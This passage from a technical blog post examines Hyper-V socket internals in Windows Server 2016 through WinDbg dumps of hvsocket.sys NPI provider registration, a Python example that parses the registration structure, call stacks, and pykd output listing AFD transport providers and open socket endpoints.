<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece070 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece078 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece080 00000000`00000000</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">fffff806`0dece088 fffff803`6c322884 nt!EtwRegisterClassicProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">NpiId GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {2227e804-8d8b-11d4-abad-009027719e09}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Data1 : 0x2227e804</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x004 Data2 : 0x8d8b</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x006 Data3 : 0x11d4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Data4 : [8] "???"</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">NPI_MODULEID_TYPE GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">ntdll!_GUID</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> {eb004a27-9b1a-11d4-9123-0050047759bc}</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x000 Data1 : 0xeb004a27</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x004 Data2 : 0x9b1a</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x006 Data3 : 0x11d4</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> +0x008 Data4 : [8] "???"</span></div>
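<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The breakpoint script above dumps the NPI_PROVIDER_CHARACTERISTICS that hvsocket.sys passes to netio!NmrRegisterProvider using hand-computed offsets. As an added example (not the blog's own script), the Python below parses the same x64 layout from a constructed memory image built from the dps output above, decodes the NpiId and ModuleId GUIDs at rcx+28h and poi(rcx+30h)+8, and checks the Length/Size fields before dereferencing. The ConstructedMemory reader and the NPI_MODULEID header values (Length 0x18, Type MIT_GUID) are assumptions; under pykd the read would be pykd.loadBytes.</span></div>

```python
import struct
import uuid
from dataclasses import dataclass
from typing import Union

# x64 layout reconstructed from the dps output on the page (example code
# added here, not the blog's script).
# NPI_PROVIDER_CHARACTERISTICS, 0x48 bytes:
#   +0x00 Version, Length            +0x08 ProviderAttachClient
#   +0x10 ProviderDetachClient       +0x18 ProviderCleanupBindingContext
#   +0x20 embedded NPI_REGISTRATION_INSTANCE (0x28 bytes):
#        +0x20 Version, Size   +0x28 NpiId   +0x30 ModuleId
#        +0x38 Number          +0x40 NpiSpecificCharacteristics
CHARACTERISTICS_FMT = "<HH4xQQQHH4xQQI4xQ"
CHARACTERISTICS_SIZE = struct.calcsize(CHARACTERISTICS_FMT)  # 0x48
INSTANCE_SIZE = CHARACTERISTICS_SIZE - 0x20                  # 0x28

# NPI_MODULEID: USHORT Length, 2 bytes padding, NPI_MODULEID_TYPE Type,
# then the union (GUID or LUID) at +8, hence "dt _GUID poi(rcx+30h)+8".
MODULEID_HEADER_FMT = "<H2xI"
MODULEID_UNION_OFFSET = 8
MIT_GUID, MIT_IF_LUID = 1, 2  # NPI_MODULEID_TYPE enumerators (netiodef.h)


class ConstructedMemory:
    """Stand-in for a debugger memory reader holding constructed bytes at
    chosen addresses. Under pykd, read() would be pykd.loadBytes(addr, size)."""

    def __init__(self):
        self._segments = {}

    def map(self, addr, data):
        self._segments[addr] = bytes(data)

    def read(self, addr, size):
        for base, data in self._segments.items():
            if base <= addr and addr + size <= base + len(data):
                return data[addr - base:addr - base + size]
        raise ValueError(f"unmapped read of {size} bytes at {addr:#x}")


@dataclass
class ProviderRegistration:
    version: int
    length: int
    attach_client: int
    detach_client: int
    cleanup_binding_context: int
    npi_id: uuid.UUID
    module_id_type: int
    module_id: Union[uuid.UUID, int]  # GUID, or the interface LUID as an int
    number: int
    npi_specific_characteristics: int


def read_guid(mem, addr):
    # GUIDs store Data1..Data3 little-endian, which bytes_le handles.
    return uuid.UUID(bytes_le=mem.read(addr, 16))


def read_module_id(mem, addr):
    """Decode NPI_MODULEID, honouring the Type discriminator of the union."""
    length, mtype = struct.unpack(MODULEID_HEADER_FMT, mem.read(addr, 8))
    if length < MODULEID_UNION_OFFSET + 8:
        raise ValueError(f"NPI_MODULEID at {addr:#x} has bad Length {length:#x}")
    if mtype == MIT_GUID:
        return mtype, read_guid(mem, addr + MODULEID_UNION_OFFSET)
    if mtype == MIT_IF_LUID:
        (luid,) = struct.unpack("<Q", mem.read(addr + MODULEID_UNION_OFFSET, 8))
        return mtype, luid
    raise ValueError(f"unknown NPI_MODULEID_TYPE {mtype} at {addr:#x}")


def parse_provider_characteristics(mem, addr):
    """Parse what netio!NmrRegisterProvider receives in rcx, with the size
    checks a breakpoint script should make before following the pointers."""
    raw = mem.read(addr, CHARACTERISTICS_SIZE)
    (version, length, attach, detach, cleanup, inst_version, inst_size,
     npiid_ptr, moduleid_ptr, number, specific) = struct.unpack(CHARACTERISTICS_FMT, raw)
    if length != CHARACTERISTICS_SIZE or inst_size != INSTANCE_SIZE:
        raise ValueError(f"unexpected sizes: Length={length:#x} Size={inst_size:#x}")
    mtype, module_id = read_module_id(mem, moduleid_ptr)
    return ProviderRegistration(version, length, attach, detach, cleanup,
                                read_guid(mem, npiid_ptr), mtype, module_id,
                                number, specific)


def build_sample_memory():
    """Constructed memory image of the hvsocket registration shown above.
    Addresses, callbacks and GUIDs come from the page's dps output; the
    NPI_MODULEID header (Length 0x18, Type MIT_GUID) is assumed."""
    mem = ConstructedMemory()
    npiid_addr = 0xfffff8060decc3e0     # hvsocket!NPI_TRANSPORT_LAYER_ID
    moduleid_addr = 0xfffff8060decc3f0  # hvsocket!NPI_MS_VMBUS_MODULEID
    mem.map(0xfffff8060dece010, struct.pack(
        CHARACTERISTICS_FMT, 0, 0x48,
        0xfffff8060ded1640, 0xfffff8060ded18c0, 0xfffff8060ded19a0,  # callbacks
        0, 0x28, npiid_addr, moduleid_addr, 0, 0xfffff8060decc2e0))
    mem.map(npiid_addr, uuid.UUID("2227e804-8d8b-11d4-abad-009027719e09").bytes_le)
    mem.map(moduleid_addr, struct.pack(MODULEID_HEADER_FMT, 0x18, MIT_GUID)
            + uuid.UUID("eb004a27-9b1a-11d4-9123-0050047759bc").bytes_le)
    return mem
```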
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Registration of NPI clients is logged in the same way; the only difference is that the breakpoint must be set on netio!NmrRegisterClient. Interestingly, no registration of hvsocket.sys as a client is observed anywhere. The only virtualization components registered as clients are NDIS!NPI_NDIS_VBUS_INTERFACE_ID (registered from NDIS!DriverEntry) and vmswitch!NPI_PKTCAP_INTERFACE_ID (registered from vmswitch!DriverEntry).</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The complete list of the providers and clients registered by Windows Server 2016 is provided on GitHub (https://github.com/gerhart01/HyperV-sockets/blob/master/RegisteredProviders.xlsx) in the following format:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"><img height="327" src="https://lh3.googleusercontent.com/0JV3c4hfmwgBKlKnPdG_yYyaim8iUlltxFgKRynEJyamIVgSOM41ki9_22yXLZT70LqaNRRWlsZdcqX3KEA5-3XAMzYbMfx5wJvL6M1HFzYawk6D-lSS7URAuGppq7bx2NL2OiCAQ0Jq6kU3Tw" style="-webkit-transform: rotate(0.00rad); border: none; transform: rotate(0.00rad);" width="543" /></span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">A default installation of Windows Server 2016 in the virtual lab registers 54 providers.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In afd.sys there is a function afd!AfdTlNotifyAttachProvider (the client module's ClientAttachProvider callback) which works with the AfdTlTransportListHead structure. We can use a small pykd script which extracts the address family of each element of that list and the dispatch function that processes it:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">2: kd> !py D:\afd_parse_AfdTlTransportListHead.py</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">cs:AfdTlTransportListHead address is 0xffffb089b4579040L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----Address family 0x0 [ AF_UNSPEC ]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">--Dispatch function tcpip!TcpTlProviderDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----Address family 0x0 [ AF_UNSPEC ]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">--Dispatch function tcpip!UdpTlProviderDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----Address family 0x0 [ AF_UNSPEC ]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">--Dispatch function tcpip!RawTlProviderDispatch</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----Address family 0x22 [ AF_HYPERV ]</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">--Dispatch function hvsocket!VmbusTlProviderDispatch</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">In principle, the afd command of the mex extension for WinDbg should output similar information, but on my stand it did not work for some reason (perhaps private symbols are necessary).</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">At the start of vmbusr.sys we see hvsocket!HvSocketProviderStart being invoked, after which afd!AfdTlNotifyAttachProvider is called.</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">0>kc</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> # Call Site</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">00 NETIO!NmrClientAttachProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">01 afd!AfdTlNotifyAttachProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">02 NETIO!NmrpProposeAttachment</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">03 NETIO!NmrpAttachArray</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">04 NETIO!NmrpRegisterModule</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">05 NETIO!NmrRegisterProvider</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">06 hvsocket!HvSocketProviderStart</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">07 vmbusr!RootDeviceAdd</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">Inside hvsocket!HvSocketProviderStart the following functions are called:</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">netio!NetioInitializeWorkQueue</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-left: 35.4pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">netio!NmrRegisterProvider</span></div>
<div dir="ltr" style="line-height: 1.295; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">hvsocket.sys is an NPI provider.</span></div>
<br /><div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The hvsocket.sys driver was added to the checks in </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">netio!NmrpVerifyModule</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> (compared with the earlier mentioned wasm article, which describes 3 modules):</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RtlInitString(&strAfd, "\\systemroot\\system32\\drivers\\afd.sys");</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RtlInitString(&strTdx, "\\systemroot\\system32\\drivers\\tdx.sys");</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RtlInitString(&strTcpip, "\\systemroot\\system32\\drivers\\tcpip.sys");</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: #0070c0; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">RtlInitString(&strHvsocket, "\\systemroot\\system32\\drivers\\hvsocket.sys");</span></div>
<br /><div dir="ltr" style="line-height: 1.295; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">The afd_parse_AfdEndpointListHead_pykd.py script can get the list of the objects created when each socket is opened. If the socket is closed, the object disappears from the list. The script, in principle, displays the same as the tcpconnect utility from the Sysinternals Suite (which, unfortunately, does not display opened Hyper-V sockets) or the </span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: underline; vertical-align: baseline;">http://codemachine.com/article_findafdendpoints.html</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 10pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;"> script</span><span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">, with additional output of the driver name and the routine that processes operations on the socket, and also the process name and PID.</span></div>
<div dir="ltr" style="line-height: 1.26; margin-bottom: 8pt; margin-top: 0pt; text-align: justify; text-indent: 35.4pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 9pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">For example, here are the contents of the lists in the guest and root OS after successful execution of an Enter-PSSession cmdlet:</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !py C:\Tools\Scripts\afd_parse_AfdEndpointListHead_pykd.py – in the guest OS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdEndpointListHead address is 0xfffff80490ef74e0L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xfffff80490ef74e0L 0xda10</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d64e7c130L 0xafd2 tcpip!TcpTlProviderEndpointDispatch explorer.exe 0x3c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d6421af60L 0xafd2 hvsocket!VmbusTlProviderEndpointDispatch powershell.exe 0x920</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d64846ea0L 0xafd4 hvsocket!VmbusTlProviderListenDispatch powershell.exe 0x920</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d64d082a0L 0xafd1 tcpip!UdpTlProviderEndpointDispatch lsass.exe 0x204</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d642b8960L 0xafd1 tcpip!UdpTlProviderEndpointDispatch lsass.exe 0x204</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d640c8ba0L 0xafd4 hvsocket!VmbusTlProviderListenDispatch svchost.exe 0x35c (this process hosts the vmicsession service)</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d650c3c30L 0xaafd 0 explorer.exe 0x3c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffffd00d64340f60L 0xaafd 0 explorer.exe 0x3c0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">---------------------------------------------------------------------------------------------</span></div>
<br /><div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">kd> !py D:\ida_files\afd_parse_AfdEndpointListHead_pykd.py – in the parent OS</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">afd!AfdEndpointListHead address is 0xfffff807668b74e0L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xfffff807668b74e0L 0xe4a0</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
<span style="background-color: transparent; color: black; font-family: Calibri; font-size: 8pt; font-style: normal; font-variant: normal; font-weight: 700; text-decoration: none; vertical-align: baseline;">----AfdEndpoint 0xffff958f202eb300L 0xafd2 hvsocket!VmbusTlProviderEndpointDispatch powershell.exe 0xcc4L</span></div>
<div dir="ltr" style="line-height: 1.2; margin-bottom: 0pt; margin-top: 0pt;">
